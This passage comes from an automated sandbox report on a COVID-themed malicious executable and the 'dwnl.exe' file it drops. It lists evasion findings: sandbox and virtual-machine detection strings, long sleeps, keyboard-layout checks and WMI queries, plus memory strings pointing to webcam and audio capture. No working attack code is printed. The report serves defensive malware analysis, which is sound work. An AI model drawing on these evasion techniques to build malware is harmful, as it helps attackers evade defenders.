Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: SBIEDLL.DLL
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp Binary or memory string: MSBIEDLL.DLL
Yara detected Beds Obfuscator
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2fcf496.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2faeb92.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000000.430155447.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.492777549.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464230298.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424995684.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432421502.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464012145.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429908152.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwnl.exe PID: 2896, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwnl.exe, type: DROPPED
Contains functionality to detect virtual machines (IN, VMware)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00401102 in eax, dx 28_2_00401102
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe TID: 6364 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe TID: 6396 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6760 Thread sleep time: -15679732462653109s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040374A GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040376Fh 28_2_0040374A
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040374A GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040376Fh 28_2_0040374A
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4713 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4309 Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040BEA2 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU? 28_2_0040BEA2
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: WerFault.exe, 00000022.00000002.466462532.0000000005400000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW.
Source: dwnl.exe, 00000021.00000002.497205914.0000000000E92000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: WerFault.exe, 00000022.00000002.466462532.0000000005400000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000022.00000002.466462532.0000000005400000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWHEB
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.429455278.0000000000C98000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp Binary or memory string: @HARDWARE\ACPI\DSDT\VBOX__PROCMON_WINDOW_CLASSPROCEXPL21invalid vector<T> subscript?playaudiodatafmt WAVERIFF.wav%Y-%m-%d %H.%MgetcamsingleframenocamerastartcamcapclosecamgetcamframeinitcamcapFreeFrameGetFrameCloseCameraOpenCameracamdlldatacamframe|dmc|[DataStart][DataStart]0000%02i:%02i:%02i:%03i [KeepAlive] Enabled! (Timeout: %i seconds)
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,FindCloseChangeNotification,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@